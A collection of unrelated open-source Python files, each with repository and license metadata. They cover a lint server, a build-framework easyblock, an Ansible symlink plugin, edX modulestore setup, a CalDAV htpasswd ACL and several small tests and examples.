help='Port for web browser interface')
parser.add_argument(
'--pymetrics_warn',
type=int,
default=5,
help='Cyclomatic complexity considered a warning, per function')
parser.add_argument(
'--pymetrics_error',
type=int,
default=10,
help='Cyclomatic complexity considered an error, per function')
return parser
def main_loop(listener, work_queue):
"""Wait for connections and process them.
@param listener: a socket.socket, open and listening.
"""
while True:
conn, _ = listener.accept()
data = conn.makefile().read()
conn.close()
work_queue.put(data)
def worker(work_queue, args):
"""Takes filename from queue, checks them and displays (emit) result.
"""
while 1:
filename = work_queue.get()
filename = filename.strip()
if not filename:
continue
check_result = checkers.check(filename, args)
if not check_result:
continue
errors, warnings, summaries = check_result
html = emitters.emit(filename, errors, warnings, summaries)
http_server.SHARED_CONDITION.acquire()
http_server.SHARED_RESULT = html
        http_server.SHARED_CONDITION.notify_all()
http_server.SHARED_CONDITION.release()
def find(name):
"""Finds a program on system path."""
for directory in syspath():
candidate = os.path.join(directory, name)
if os.path.exists(candidate):
return candidate
return None
def syspath():
"""OS path as array of strings"""
path = os.getenv('PATH').split(':')
return path
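# ---------------------------------------------------------------------------
# Hedged client sketch (illustrative addition, not part of upstream
# lintswitch): the wire protocol handled by main_loop() is just "connect,
# send a filename, close" -- the server reads until EOF. send_lint_request is
# a hypothetical helper name.
def send_lint_request(filename, port=4008):
    """Ask a running lintswitch to check `filename`."""
    conn = socket.socket()
    conn.connect(('127.0.0.1', port))
    conn.sendall(filename.encode('utf-8'))
    conn.close()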
if __name__ == '__main__':
sys.exit(main())
|
grahamking/lintswitch
|
lintswitch/main.py
|
Python
|
gpl-3.0
| 4,151
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# no_check_set of check_output must be None
no_check_set_white_list = [
'fake_quantize_range_abs_max',
'coalesce_tensor',
'flatten2',
'flatten_contiguous_range',
'lrn',
'squeeze2',
'reshape2',
'transpose2',
'unsqueeze2',
'cross_entropy2',
'seed',
'check_finite_and_unscale',
'update_loss_scaling',
'cudnn_lstm',
'rnn',
'fusion_lstm',
'softmax_with_cross_entropy',
'svd',
'eigh',
'eigvalsh',
'class_center_sample',
]
|
luotao1/Paddle
|
python/paddle/fluid/tests/unittests/white_list/no_check_set_white_list.py
|
Python
|
apache-2.0
| 1,111
|
import os
from setuptools import setup, find_packages
from packstack import version
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="packstack",
version=version.version_string(),
author="Derek Higgins",
author_email="derekh@redhat.com",
description=("A utility to install openstack"),
license="ASL 2.0",
keywords="openstack",
url="https://github.com/stackforge/packstack",
packages=find_packages('.'),
include_package_data=True,
long_description=read('README'),
zip_safe=False,
install_requires=['netaddr'],
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
],
scripts=["bin/packstack"]
)
|
mohitsethi/packstack
|
setup.py
|
Python
|
apache-2.0
| 1,032
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from tutorial import Calculator
from tutorial.ttypes import *
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
try:
# Make socket
transport = TSocket.TSocket('localhost', 9090)
# Buffering is critical. Raw sockets are very slow
transport = TTransport.TBufferedTransport(transport)
# Wrap in a protocol
protocol = TBinaryProtocol.TBinaryProtocol(transport)
# Create a client to use the protocol encoder
client = Calculator.Client(protocol)
# Connect!
transport.open()
print('Connected')
client.ping()
print('ping()')
sum = client.add(1, 1)
print('1+1=%d' % (sum))
work = Work()
work.op = Operation.DIVIDE
work.num1 = 1
work.num2 = 0
try:
quotient = client.calculate(1, work)
print('Whoa? You know how to divide by zero?')
except InvalidOperation as io:
print('InvalidOperation: %r' % io)
work.op = Operation.SUBTRACT
work.num1 = 15
work.num2 = 10
diff = client.calculate(1, work)
print('15-10=%d' % (diff))
log = client.getStruct(1)
print('Check log: %s' % (log.value))
# Close!
transport.close()
except Thrift.TException as tx:
print('%s' % (tx.message))
|
uber/fbthrift
|
thrift/tutorial/py/PythonClient.py
|
Python
|
apache-2.0
| 2,254
|
##
# Copyright 2009-2015 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing toy, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
"""
import os
import platform
import shutil
from easybuild.framework.easyblock import EasyBlock
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.filetools import mkdir
from easybuild.tools.modules import get_software_root, get_software_version
from easybuild.tools.run import run_cmd
class EB_toy(EasyBlock):
"""Support for building/installing toy."""
def prepare_for_extensions(self):
"""
Prepare for installing toy extensions.
"""
# insert new packages by building them with RPackage
self.cfg['exts_defaultclass'] = "Toy_Extension"
self.cfg['exts_filter'] = ("%(ext_name)s", "")
def configure_step(self, name=None):
"""Configure build of toy."""
if name is None:
name = self.name
# make sure Python system dep is handled correctly when specified
if self.cfg['allow_system_deps']:
if get_software_root('Python') != 'Python' or get_software_version('Python') != platform.python_version():
raise EasyBuildError("Sanity check on allowed Python system dep failed.")
if os.path.exists("%s.source" % name):
os.rename('%s.source' % name, '%s.c' % name)
def build_step(self, name=None):
"""Build toy."""
if name is None:
name = self.name
run_cmd('%(prebuildopts)s gcc %(name)s.c -o %(name)s' % {
'name': name,
'prebuildopts': self.cfg['prebuildopts'],
})
def install_step(self, name=None):
"""Install toy."""
if name is None:
name = self.name
bindir = os.path.join(self.installdir, 'bin')
mkdir(bindir, parents=True)
if os.path.exists(name):
shutil.copy2(name, bindir)
# also install a dummy libtoy.a, to make the default sanity check happy
libdir = os.path.join(self.installdir, 'lib')
mkdir(libdir, parents=True)
        with open(os.path.join(libdir, 'lib%s.a' % name), 'w') as f:
            f.write(name.upper())
|
nesi/easybuild-framework
|
test/framework/sandbox/easybuild/easyblocks/t/toy.py
|
Python
|
gpl-2.0
| 3,252
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import os.path
from ansible.errors import AnsibleError
from ansible.module_utils._text import to_text
from ansible.plugins.action import ActionBase
class ActionModule(ActionBase):
def run(self, tmp=None, task_vars=None):
        ''' handler for symlink operations '''
if task_vars is None:
task_vars = dict()
result = super(ActionModule, self).run(tmp, task_vars)
if result.get('skipped'):
return result
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', source)
if source is None:
result['failed'] = True
result['msg'] = "src is required"
return result
try:
source = self._find_needle('files', source)
except AnsibleError as e:
result['failed'] = True
result['msg'] = to_text(e)
return result
# expand any user home dir specifier
dest = self._remote_expand_user(dest)
if not os.path.isabs(dest):
dest = self._connection._shell.join_path('~', dest)
dest = self._remote_expand_user(dest)
# Ensure dest file parents exist
dest_dir = os.path.dirname(os.path.abspath(dest))
module_return = self._execute_module(
module_name='file',
module_args=dict(path=dest_dir, state='directory', follow='yes'),
task_vars=task_vars,
tmp=tmp)
result.update(module_return)
if result.get('failed'):
return result
module_return = self._execute_module(
module_name='file',
module_args=dict(src=source, dest=dest, state='link', force='yes'),
task_vars=task_vars,
tmp=tmp)
result.update(module_return)
return result
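# ---------------------------------------------------------------------------
# Hedged usage sketch (illustrative addition, not part of this dotfiles
# repo): a playbook task using this action plugin might look like the
# following; the values are illustrative only.
#
#   - name: symlink a dotfile into place
#     link:
#       src: vimrc       # resolved on the controller via _find_needle('files', ...)
#       dest: ~/.vimrc   # '~' expanded by _remote_expand_user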
|
hanjianwei/dotfiles
|
action_plugins/link.py
|
Python
|
gpl-3.0
| 1,931
|
import logging
from datetime import datetime
from .actions import actions
from .system_menu.system_menu import system_menu
from .library.buttons import library_buttons
from .book.buttons import book_buttons
from .go_to_page.buttons import go_to_page_buttons
from .bookmarks.buttons import bookmarks_buttons
from .language.buttons import language_buttons
log = logging.getLogger(__name__)
bindings = {
'library': library_buttons,
'book': book_buttons,
'go_to_page': go_to_page_buttons,
'bookmarks_menu': bookmarks_buttons,
'language': language_buttons,
'help_menu': {
'single': {
'L': actions.close_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'R': actions.toggle_help_menu(),
},
'long': {
'L': actions.close_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'R': actions.toggle_help_menu(),
'X': actions.reset_display('start'),
},
},
'system_menu': {
'single': {
'R': actions.toggle_help_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'L': actions.close_menu(),
},
'long': {
'R': actions.toggle_help_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'L': actions.close_menu(),
'X': actions.reset_display('start'),
},
}
}
sys_menu = system_menu()
for i, item in enumerate(sys_menu):
action = sys_menu[item]
bindings['system_menu']['single'][str(i + 2)] = action
async def dispatch_button(key, press_type, state, dispatch):
if state['help_menu']['visible']:
location = 'help_menu'
else:
location = state['location']
try:
action = bindings[location][press_type][key]
except KeyError:
log.debug('no binding for key {}, {} press'.format(key, press_type))
else:
await dispatch(action)
prev_buttons = {}
long_buttons = {}
async def check(driver, state, dispatch):
    # This is a hack for now until we change the protocol: we read the buttons
    # twice so we don't miss the release of short presses.
for _ in range(2):
buttons = driver.get_buttons()
for key in buttons:
up_or_down = buttons[key]
if up_or_down == 'down':
prev_buttons[key] = datetime.now()
elif up_or_down == 'up':
if key in long_buttons:
del long_buttons[key]
del prev_buttons[key]
else:
if key in prev_buttons:
del prev_buttons[key]
await dispatch_button(key, 'single', state, dispatch)
for key in prev_buttons:
diff = (datetime.now() - prev_buttons[key]).total_seconds()
if diff > 0.5:
prev_buttons[key] = datetime.now()
long_buttons[key] = True
await dispatch_button(key, 'long', state, dispatch)
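# ---------------------------------------------------------------------------
# Hedged sketch (illustrative addition, not part of upstream canute-ui):
# dispatch_button resolves an action by (location, press type, key). Runnable
# only in the package context, since the relative imports above must resolve;
# the fake state and dispatch below are illustrative.
if __name__ == "__main__":
    import asyncio

    async def fake_dispatch(action):
        print('dispatching', action)

    fake_state = {'help_menu': {'visible': True}, 'location': 'book'}
    # The help menu is visible, so a single 'L' press maps to close_menu().
    asyncio.run(dispatch_button('L', 'single', fake_state, fake_dispatch))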
|
Bristol-Braille/canute-ui
|
ui/buttons.py
|
Python
|
gpl-3.0
| 3,110
|
"""
Module that provides a connection to the ModuleStore specified in the django settings.
Passes settings.MODULESTORE as kwargs to MongoModuleStore
"""
from importlib import import_module
import gettext
import logging
import six
from pkg_resources import resource_filename
import re
from django.conf import settings
# This configuration must be executed BEFORE any additional Django imports. Otherwise, the imports may fail due to
# Django not being configured properly. This mostly applies to tests.
if not settings.configured:
settings.configure()
from django.core.cache import caches, InvalidCacheBackendError
import django.dispatch
import django.utils
from django.utils.translation import get_language, to_locale
from edx_django_utils.cache import DEFAULT_REQUEST_CACHE
from xmodule.contentstore.django import contentstore
from xmodule.modulestore.draft_and_published import BranchSettingMixin
from xmodule.modulestore.mixed import MixedModuleStore
from xmodule.util.xmodule_django import get_current_request_hostname
# We also may not always have the current request user (crum) module available
try:
from xblock_django.user_service import DjangoXBlockUserService
from crum import get_current_user
HAS_USER_SERVICE = True
except ImportError:
HAS_USER_SERVICE = False
try:
from xblock_django.api import disabled_xblocks
except ImportError:
disabled_xblocks = None
log = logging.getLogger(__name__)
ASSET_IGNORE_REGEX = getattr(settings, "ASSET_IGNORE_REGEX", r"(^\._.*$)|(^\.DS_Store$)|(^.*~$)")
class SwitchedSignal(django.dispatch.Signal):
"""
SwitchedSignal is like a normal Django signal, except that you can turn it
on and off. This is especially useful for tests where we want to be able to
isolate signals and disable expensive operations that are irrelevant to
what's being tested (like everything that triggers off of a course publish).
SwitchedSignals default to being on. You should be very careful if you ever
turn one off -- the only instances of this class are shared class attributes
of `SignalHandler`. You have to make sure that you re-enable the signal when
you're done, or else you may permanently turn that signal off for that
process. I can't think of any reason you'd want to disable signals outside
of running tests.
"""
def __init__(self, name, *args, **kwargs):
"""
The `name` parameter exists only to make debugging more convenient.
All other args are passed to the constructor for django.dispatch.Signal.
"""
super(SwitchedSignal, self).__init__(*args, **kwargs)
self.name = name
self._allow_signals = True
def disable(self):
"""
Turn off signal sending.
All calls to send/send_robust will no-op.
"""
self._allow_signals = False
def enable(self):
"""
Turn on signal sending.
Calls to send/send_robust will behave like normal Django Signals.
"""
self._allow_signals = True
def send(self, *args, **kwargs):
"""
See `django.dispatch.Signal.send()`
This method will no-op and return an empty list if the signal has been
disabled.
"""
log.debug(
"SwitchedSignal %s's send() called with args %s, kwargs %s - %s",
self.name,
args,
kwargs,
"ALLOW" if self._allow_signals else "BLOCK"
)
if self._allow_signals:
return super(SwitchedSignal, self).send(*args, **kwargs)
return []
def send_robust(self, *args, **kwargs):
"""
See `django.dispatch.Signal.send_robust()`
This method will no-op and return an empty list if the signal has been
disabled.
"""
log.debug(
"SwitchedSignal %s's send_robust() called with args %s, kwargs %s - %s",
self.name,
args,
kwargs,
"ALLOW" if self._allow_signals else "BLOCK"
)
if self._allow_signals:
return super(SwitchedSignal, self).send_robust(*args, **kwargs)
return []
def __repr__(self):
return u"SwitchedSignal('{}')".format(self.name)
class SignalHandler(object):
"""
This class is to allow the modulestores to emit signals that can be caught
by other parts of the Django application. If your app needs to do something
every time a course is published (e.g. search indexing), you can listen for
that event and kick off a celery task when it happens.
To listen for a signal, do the following::
from django.dispatch import receiver
from celery.task import task
from xmodule.modulestore.django import modulestore, SignalHandler
@receiver(SignalHandler.course_published)
def listen_for_course_publish(sender, course_key, **kwargs):
do_my_expensive_update.delay(course_key)
@task()
def do_my_expensive_update(course_key):
# ...
Things to note:
1. We receive using the Django Signals mechanism.
2. The sender is going to be the class of the modulestore sending it.
3. The names of your handler function's parameters *must* be "sender" and "course_key".
4. Always have **kwargs in your signal handler, as new things may be added.
5. The thing that listens for the signal lives in process, but should do
almost no work. Its main job is to kick off the celery task that will
do the actual work.
"""
# If you add a new signal, please don't forget to add it to the _mapping
# as well.
pre_publish = SwitchedSignal("pre_publish", providing_args=["course_key"])
course_published = SwitchedSignal("course_published", providing_args=["course_key"])
course_deleted = SwitchedSignal("course_deleted", providing_args=["course_key"])
library_updated = SwitchedSignal("library_updated", providing_args=["library_key"])
item_deleted = SwitchedSignal("item_deleted", providing_args=["usage_key", "user_id"])
_mapping = {
signal.name: signal
for signal
in [pre_publish, course_published, course_deleted, library_updated, item_deleted]
}
def __init__(self, modulestore_class):
self.modulestore_class = modulestore_class
@classmethod
def all_signals(cls):
"""Return a list with all our signals in it."""
return cls._mapping.values()
@classmethod
def signal_by_name(cls, signal_name):
"""Given a signal name, return the appropriate signal."""
return cls._mapping[signal_name]
def send(self, signal_name, **kwargs):
"""
Send the signal to the receivers.
"""
signal = self._mapping[signal_name]
responses = signal.send_robust(sender=self.modulestore_class, **kwargs)
for receiver, response in responses:
log.info('Sent %s signal to %s with kwargs %s. Response was: %s', signal_name, receiver, kwargs, response)
# to allow easy imports
globals().update({sig.name.upper(): sig for sig in SignalHandler.all_signals()})
def load_function(path):
"""
Load a function by name.
Arguments:
path: String of the form 'path.to.module.function'. Strings of the form
'path.to.module:Class.function' are also valid.
Returns:
The imported object 'function'.
"""
if ':' in path:
module_path, _, method_path = path.rpartition(':')
module = import_module(module_path)
class_name, method_name = method_path.split('.')
_class = getattr(module, class_name)
function = getattr(_class, method_name)
else:
module_path, _, name = path.rpartition('.')
function = getattr(import_module(module_path), name)
return function
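# (Hedged illustrative sketch, not part of upstream edx-platform.) Both path
# formats accepted by load_function, using stdlib targets purely for
# illustration:
#
#     load_function('os.path.join')             # 'path.to.module.function'
#     load_function('json:JSONEncoder.encode')  # 'path.to.module:Class.function'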
def create_modulestore_instance(
engine,
content_store,
doc_store_config,
options,
i18n_service=None,
fs_service=None,
user_service=None,
signal_handler=None,
):
"""
This will return a new instance of a modulestore given an engine and options
"""
# Import is placed here to avoid model import at project startup.
import xblock.reference.plugins
class_ = load_function(engine)
_options = {}
_options.update(options)
FUNCTION_KEYS = ['render_template']
for key in FUNCTION_KEYS:
if key in _options and isinstance(_options[key], six.string_types):
_options[key] = load_function(_options[key])
request_cache = DEFAULT_REQUEST_CACHE
try:
metadata_inheritance_cache = caches['mongo_metadata_inheritance']
except InvalidCacheBackendError:
metadata_inheritance_cache = caches['default']
if issubclass(class_, MixedModuleStore):
_options['create_modulestore_instance'] = create_modulestore_instance
if issubclass(class_, BranchSettingMixin):
_options['branch_setting_func'] = _get_modulestore_branch_setting
if HAS_USER_SERVICE and not user_service:
xb_user_service = DjangoXBlockUserService(get_current_user())
else:
xb_user_service = None
xblock_field_data_wrappers = [load_function(path) for path in settings.XBLOCK_FIELD_DATA_WRAPPERS]
def fetch_disabled_xblock_types():
"""
Get the disabled xblock names, using the request_cache if possible to avoid hitting
a database every time the list is needed.
"""
# If the import could not be loaded, return an empty list.
if disabled_xblocks is None:
return []
if 'disabled_xblock_types' not in request_cache.data:
request_cache.data['disabled_xblock_types'] = [block.name for block in disabled_xblocks()]
return request_cache.data['disabled_xblock_types']
return class_(
contentstore=content_store,
metadata_inheritance_cache_subsystem=metadata_inheritance_cache,
request_cache=request_cache,
xblock_mixins=getattr(settings, 'XBLOCK_MIXINS', ()),
xblock_select=getattr(settings, 'XBLOCK_SELECT_FUNCTION', None),
xblock_field_data_wrappers=xblock_field_data_wrappers,
disabled_xblock_types=fetch_disabled_xblock_types,
doc_store_config=doc_store_config,
i18n_service=i18n_service or ModuleI18nService,
fs_service=fs_service or xblock.reference.plugins.FSService(),
user_service=user_service or xb_user_service,
signal_handler=signal_handler or SignalHandler(class_),
**_options
)
# A singleton instance of the Mixed Modulestore
_MIXED_MODULESTORE = None
def modulestore():
"""
Returns the Mixed modulestore
"""
global _MIXED_MODULESTORE # pylint: disable=global-statement
if _MIXED_MODULESTORE is None:
_MIXED_MODULESTORE = create_modulestore_instance(
settings.MODULESTORE['default']['ENGINE'],
contentstore(),
settings.MODULESTORE['default'].get('DOC_STORE_CONFIG', {}),
settings.MODULESTORE['default'].get('OPTIONS', {})
)
if settings.FEATURES.get('CUSTOM_COURSES_EDX'):
# TODO: This import prevents a circular import issue, but is
# symptomatic of a lib having a dependency on code in lms. This
# should be updated to have a setting that enumerates modulestore
# wrappers and then uses that setting to wrap the modulestore in
# appropriate wrappers depending on enabled features.
from lms.djangoapps.ccx.modulestore import CCXModulestoreWrapper
_MIXED_MODULESTORE = CCXModulestoreWrapper(_MIXED_MODULESTORE)
return _MIXED_MODULESTORE
def clear_existing_modulestores():
"""
Clear the existing modulestore instances, causing
them to be re-created when accessed again.
This is useful for flushing state between unit tests.
"""
global _MIXED_MODULESTORE # pylint: disable=global-statement
_MIXED_MODULESTORE = None
class ModuleI18nService(object):
"""
Implement the XBlock runtime "i18n" service.
Mostly a pass-through to Django's translation module.
django.utils.translation implements the gettext.Translations interface (it
has ugettext, ungettext, etc), so we can use it directly as the runtime
i18n service.
"""
def __init__(self, block=None):
"""
Attempt to load an XBlock-specific GNU gettext translator using the XBlock's own domain
translation catalog, currently expected to be found at:
<xblock_root>/conf/locale/<language>/LC_MESSAGES/<domain>.po|mo
If we can't locate the domain translation catalog then we fall-back onto
django.utils.translation, which will point to the system's own domain translation catalog
This effectively achieves translations by coincidence for an XBlock which does not provide
its own dedicated translation catalog along with its implementation.
"""
self.translator = django.utils.translation
if block:
xblock_class = getattr(block, 'unmixed_class', block.__class__)
xblock_resource = xblock_class.__module__
xblock_locale_dir = 'translations'
xblock_locale_path = resource_filename(xblock_resource, xblock_locale_dir)
xblock_domain = 'text'
selected_language = get_language()
try:
self.translator = gettext.translation(
xblock_domain,
xblock_locale_path,
[to_locale(selected_language if selected_language else settings.LANGUAGE_CODE)]
)
except IOError:
# Fall back to the default Django translator if the XBlock translator is not found.
pass
def __getattr__(self, name):
name = 'gettext' if six.PY3 and name == 'ugettext' else name
return getattr(self.translator, name)
def strftime(self, *args, **kwargs):
"""
A locale-aware implementation of strftime.
"""
# This is the wrong place to import this function. I'm putting it here
# because the xmodule test suite can't import this module, because
# Django is not available in that suite. This function isn't called in
# that suite, so this hides the import so the test won't fail.
#
# As I said, this is wrong. But Cale says this code will soon be
# refactored to a place that will be right, and the code can be made
# right there. If you are reading this comment after April 1, 2014,
# then Cale was a liar.
from util.date_utils import strftime_localized
return strftime_localized(*args, **kwargs)
def _get_modulestore_branch_setting():
"""
Returns the branch setting for the module store from the current Django request if configured,
else returns the branch value from the configuration settings if set,
else returns None
The value of the branch setting is cached in a thread-local variable so it is not repeatedly recomputed
"""
def get_branch_setting():
"""
Finds and returns the branch setting based on the Django request and the configuration settings
"""
branch = None
hostname = get_current_request_hostname()
if hostname:
# get mapping information which is defined in configurations
mappings = getattr(settings, 'HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS', None)
# compare hostname against the regex expressions set of mappings which will tell us which branch to use
if mappings:
for key in mappings:
if re.match(key, hostname):
return mappings[key]
if branch is None:
branch = getattr(settings, 'MODULESTORE_BRANCH', None)
return branch
# leaving this in code structured in closure-friendly format b/c we might eventually cache this (again)
# using request_cache
return get_branch_setting()
|
msegado/edx-platform
|
common/lib/xmodule/xmodule/modulestore/django.py
|
Python
|
agpl-3.0
| 16,136
|
#!/usr/bin/python
from datetime import datetime
class Test(object):
def __init__(self):
self._bla = 0
def incr(self):
self._bla += 1
def meth1():
t = Test()
for _ in xrange(1000000):
t.incr()
def meth2():
t = Test()
incr = t.incr
for _ in xrange(1000000):
incr()
def start():
a = datetime.now()
meth2()
b = datetime.now()
print b - a
a = datetime.now()
meth1()
b = datetime.now()
print b - a
if __name__ == '__main__':
start()
|
david-furminieux/movingForest
|
src/methPerf.py
|
Python
|
lgpl-3.0
| 547
|
# -*- coding: utf-8 -*-
#
# This file is part of Calypso Server - Calendar Server
# Copyright © 2008-2011 Guillaume Ayoub
# Copyright © 2008 Nicolas Kandel
# Copyright © 2008 Pascal Halter
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Calypso. If not, see <http://www.gnu.org/licenses/>.
"""
Htpasswd ACL.
Load the list of login/password couples according to the configuration file
created by the Apache ``htpasswd`` command. Plain-text, crypt, sha1 and bcrypt
are supported, but md5 is not (see the ``htpasswd`` man page to understand why).
"""
import base64
import hashlib
import os.path
import logging
try:
import bcrypt
have_bcrypt = True
except ImportError:
have_bcrypt = False
from calypso import config
log = logging.getLogger()
def _plain(hash_value, password):
"""Check if ``hash_value`` and ``password`` match using plain method."""
return hash_value == password
def _crypt(hash_value, password):
"""Check if ``hash_value`` and ``password`` match using crypt method."""
# The ``crypt`` module is only present on Unix, import if needed
import crypt
return crypt.crypt(password, hash_value) == hash_value
def _sha1(hash_value, password):
"""Check if ``hash_value`` and ``password`` match using sha1 method."""
hash_value = hash_value.replace("{SHA}", "").encode("ascii")
password = password.encode(config.get("encoding", "stock"))
sha1 = hashlib.sha1() # pylint: disable=E1101
sha1.update(password)
return sha1.digest() == base64.b64decode(hash_value)
def _bcrypt(hash_value, password):
if have_bcrypt:
password = password.encode(config.get("encoding", "stock"))
return bcrypt.hashpw(password, hash_value) == hash_value
else:
log.error("Bcrypt module is missing, cannot authenticate")
return False
def has_right(owner, user, password):
"""Check if ``user``/``password`` couple is valid."""
log.debug("owner '%s' user '%s'", owner, user)
for line in open(FILENAME).readlines():
if line.strip():
login, hash_value = line.strip().split(":", 1)
if login == user and (not PERSONAL or user == owner):
return CHECK_PASSWORD(hash_value, password)
return False
FILENAME = os.path.expanduser(config.get("acl", "filename"))
PERSONAL = config.getboolean("acl", "personal")
CHECK_PASSWORD = locals()["_%s" % config.get("acl", "encryption")]
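# ---------------------------------------------------------------------------
# Hedged sketch (illustrative addition, not part of upstream calypso): an
# Apache "{SHA}" entry is simply base64(sha1(password)). This mirrors what
# _sha1() checks, but hard-codes utf-8 instead of reading the encoding from
# the calypso config; runnable only where the calypso imports above resolve.
if __name__ == "__main__":
    stored = "{SHA}" + base64.b64encode(hashlib.sha1(b"secret").digest()).decode("ascii")
    candidate = hashlib.sha1("secret".encode("utf-8")).digest()
    assert candidate == base64.b64decode(stored.replace("{SHA}", ""))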
|
agx/calypso
|
calypso/acl/htpasswd.py
|
Python
|
gpl-3.0
| 2,935
|
#!/usr/bin/env python
from flask import Flask
from flask.ext.saresource import SAResource
from models import db_session
from models import Todo
app = Flask(__name__)
api = SAResource(app, db_session, url_prefix='/api/v0.1')
# registers GET/POST/DELETE/PUT endpoints at '/api/v0.1/todos' (tablename used for url by default)
api.add_resource(Todo)
app.run(debug=True)
|
mmautner/Flask-SAResource
|
examples/app.py
|
Python
|
mit
| 373
|
import time
import os
import sys
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from nw_util import *
chrome_options = Options()
chrome_options.add_argument("nwapp=" + os.path.dirname(os.path.abspath(__file__)))
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
try:
wait_switch_window_name(driver, 'index')
print driver.current_url
result = wait_for_element_id(driver, 'result')
result2 = wait_for_element_id(driver, 'result2')
print result
print result2
assert(result == 'success from popup' and result2 == 'startiframe')
finally:
#time.sleep(50)
driver.quit()
|
nwjs/nw.js
|
test/sanity/document-start-end/test.py
|
Python
|
mit
| 768
|
initialRobotLoc(2.0, 0.5)
dimensions(4.05,6.05)
wall((1.5,3.0),(3.0,3.0))
wall((3.0, 3.0),(3.0,3.5))
wall((3.0,3.5),(2.0,3.5))
wall((2.0,3.5),(2.0,4.5))
wall((2.0,4.5),(1.5,4.5))
wall((1.5,4.5),(1.5,3.0))
wall((1.2,1.5),(3.0,1.5))
wall((3.0, 1.5),(3.0,2.0))
wall((3.0,2.0),(1.2,2.0))
wall((1.2,2.0),(1.2,1.5))
|
Cynary/distro6.01
|
arch/6.01Soft/lib601-F13-4/soar/worlds/raceWorld.py
|
Python
|
mit
| 312
|
#!/usr/bin/env python
#
# A simple command line validator for TDoc2 YAML/Markdown based documentation
#
import os, sys, re
apiDocDir = os.path.abspath(os.path.dirname(__file__))
# We package markdown in support/common.
commonSupportDir = os.path.abspath(os.path.join(apiDocDir, '..', 'support', 'common'))
if os.path.exists(commonSupportDir):
sys.path.append(commonSupportDir)
import codecs, optparse, platform
import markdown
try:
import yaml
except:
print >> sys.stderr, "You don't have pyyaml!\n"
print >> sys.stderr, "You can install it with:\n"
print >> sys.stderr, "> sudo easy_install pyyaml\n"
print >> sys.stderr, ""
sys.exit(1)
VALID_PLATFORMS = ["android", "iphone", "ipad", "mobileweb"]
VALID_KEYS = {
"type": ["name", "summary", "description", "createable", "platforms", "extends",
"excludes", "since", "deprecated", "osver", "examples", "methods", "properties",
"events"],
"method": ["name", "summary", "description", "returns", "platforms", "since",
"deprecated", "osver", "examples", "parameters"],
"parameter": ["name", "summary", "type", "optional", "default", "repeatable"],
"property": ["name", "summary", "description", "type", "platforms", "since",
"deprecated", "osver", "examples", "permission", "availability", "accessors",
"optional", "value", "default"],
"event": ["name", "summary", "description", "extends", "platforms", "since",
"deprecated", "osver", "properties"],
"eventprop": ["name", "summary", "type", "platforms", "deprecated"],
"deprecated": ["since", "removed", "notes"]
}
types = {}
typesFromDocgen = None
errorTrackers = {}
options = None
def stringFrom(error):
if isinstance(error, basestring):
return error
elif isinstance(error, dict):
return "returns - " + str(error)
else:
return error.name
class Printer:
    def __init__(self):
        self.error_count = 0
    def errorCount(self):
        return self.error_count
class PrettyPrinter(Printer):
def printCheck(self, error, indent=1):
if not options.errorsOnly:
print u'%s\u2713 \033[92m%s\033[0m' % ('\t' * indent, stringFrom(error))
def printError(self, error, indent=1):
print >>sys.stderr, u'%s\u0078 \033[91m%s\033[0m' % ('\t' * indent, stringFrom(error))
def printStatus(self, path, error):
